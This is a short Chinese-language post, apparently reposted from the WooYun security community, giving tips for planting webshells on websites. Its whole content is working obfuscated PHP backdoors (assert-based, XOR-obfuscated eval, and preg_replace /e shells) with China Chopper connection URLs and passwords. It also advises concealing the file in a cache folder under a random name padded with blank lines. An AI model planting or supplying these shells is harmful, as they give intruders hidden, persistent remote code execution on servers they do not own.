网站留webshell的一些技巧
08-29
来自乌云的坏虾
我喜欢建在缓存文件夹下面。~aadsSFDSWR~FSDGDFG.php 然后一顿回车,在最后面添加一段
First:1.php
<?php ($_=@$_GET[2]).@$_($_POST[1])?>菜刀里写:http://localhost/1.php?2=assert
密码:1
Second:2.php
复制代码
代码如下:
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
菜刀里写:http://localhost/2.php?_=assert&__=eval($_POST['pass'])
密码:pass
我发的这些都是网上公开的了,想让人发现不了,就自己整点有意思的。
我现在喜欢用这个
@preg_replace(“/[email]/e”,$_POST['h'],”error”);
?>
菜刀附加数据:
h=@eval($_POST[c]);
密码 c
不过仔细查下preg_replace,还是会被发现。 一样,都是已经被公开的了。